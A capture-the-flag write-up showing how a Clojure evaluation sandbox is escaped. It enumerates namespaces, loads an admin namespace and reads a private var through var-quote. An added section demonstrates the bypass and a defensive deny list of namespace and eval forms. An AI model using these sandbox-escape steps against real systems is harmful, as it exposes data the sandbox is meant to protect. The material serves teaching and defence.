backdoor CTF 2015: NONAME

Category: Exploit
Points: 200
Author: Amanpreet Singh
Difficulty:
Solves: 25
Description:

Interestingly enough, even though it was not expected, Chintu found a cool website to play with, though he can't get the flag. Can you? Visit this. Submit the SHA-256 hash of the flag obtained.

Write-up

by polym

We are given a Clojure sandbox and have to find the flag and secret of a user named admin.

Entering valid Clojure code, we can execute several functions, e.g. printing the version:

Give me some code:
> (clojure-version)
"1.4.0"

After learning a bit about Clojure, we first list all loaded namespaces with the all-ns function, looking for suspicious functions or namespaces:

> (all-ns)
[..see all-ns file..]

We see a namespace named noname.people.admin, so we load it under an alias and look for variables in it:

> (require '[noname.people.admin :as adm])
nil
> (adm/flag)
Ma flag is : [REDACTED]
> (adm/secret)
java.lang.IllegalStateException: var: #'noname.people.admin/secret is not public

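Hmm, we can call flag, but not secret, because the var secret is private. Fortunately, there is a way to read private variables, described here. The reader macro #' (var-quote) refers to the var object itself instead of resolving the symbol, so the check for private vars does not apply, and calling the var invokes the function it holds: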

> (#'adm/secret)
"Ma secret is: [REDACTED]"

We concatenate these two strings, compute the SHA-256 hash of the result, and get the flag!
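
The following is an added example, not part of the original write-up or the challenge's code: it shows that a private var is still reachable through var-quote, and one way a sandbox can reject such forms by inspecting the code before evaluating it. The namespaces `demo.admin` and `demo.sandbox`, the deny list and the allowlist are constructed assumptions.

```clojure
;; Constructed stand-in for the challenge's noname.people.admin namespace.
(ns demo.admin)
(defn flag [] "constructed-flag")
(defn- secret [] "constructed-secret")     ; private, like the challenge's secret

(ns demo.sandbox)                          ; hypothetical sandbox-side namespace

;; Privacy is only checked when a symbol is resolved; the var stays reachable.
(println (#'demo.admin/secret))            ; var-quote, as in the write-up

(def denied-symbols
  "Forms that reach vars or namespaces outside the sandbox (constructed list)."
  '#{var require use refer alias ns in-ns resolve ns-resolve find-var intern
     all-ns ns-interns ns-map eval load-string read-string})

(def allowed-namespaces
  "Namespaces user code may reference by qualified symbol (assumption)."
  #{"clojure.string"})

(defn violations
  "Returns the set of symbols in the first form of code-str that the policy
  rejects. The code is only read, never evaluated; #'x reads as (var x)."
  [code-str]
  (let [form (binding [*read-eval* false] (read-string code-str))]
    (->> (tree-seq coll? seq form)
         (filter symbol?)
         (filter (fn [sym]
                   (or (contains? denied-symbols (symbol (name sym)))
                       (and (namespace sym)
                            (not (contains? allowed-namespaces (namespace sym)))))))
         set)))

;; The inputs from the write-up, plus one harmless form.
(doseq [code ["(all-ns)"
              "(require '[noname.people.admin :as adm])"
              "(#'adm/secret)"
              "(clojure.string/upper-case \"ok\")"]]
  (println code "->" (violations code)))
```

An empty set means the form passed the check; the three inputs from the write-up each return at least one rejected symbol.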

Other write-ups and resources
